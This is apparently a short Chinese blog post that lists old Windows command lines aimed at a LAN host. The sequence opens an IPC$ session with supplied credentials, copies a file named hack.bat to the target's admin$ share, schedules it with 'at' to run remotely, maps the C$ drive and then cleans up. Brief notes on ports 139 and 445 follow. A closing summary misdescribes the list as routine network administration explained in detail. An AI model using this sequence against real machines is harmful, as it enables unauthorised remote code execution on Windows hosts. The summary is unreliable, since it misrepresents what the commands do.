几条命令,可能有些古董。
ipconfig
ping 192.168.1.104
nc -v -z -w 5 192.168.1.104 139 445
net use \\192.168.1.104\ipc$ "test" /user:"test"
copy hack.bat \\192.168.1.104\admin$
net time \\192.168.1.104
at \\192.168.1.104\\ 22:05 hack.bat
at \\192.168.1.104 1 /del
net use z: \\192.168.1.104\c$
net use z: /del
net use \\192.168.1.104\ipc$ /del
Port 139 NetBIOS
NetBIOS Session (TCP), Windows File and Printer Sharing.
Port 445 SMB
In Windows 2000, Microsoft has created a new transport for SMB over TCP and UDP on port 445. This replaces the older implementation that was over ports 137, 138, 139.
本文深入探讨了Windows系统中常用的网络命令,包括ipconfig、ping、nc、netuse、copy、nettime、at等,详细解释了它们的功能和用法。重点介绍了Port 139 NetBIOS和Port 445 SMB的相关知识,帮助读者了解这些命令在Windows网络管理中的应用。

被折叠的 条评论
为什么被折叠?



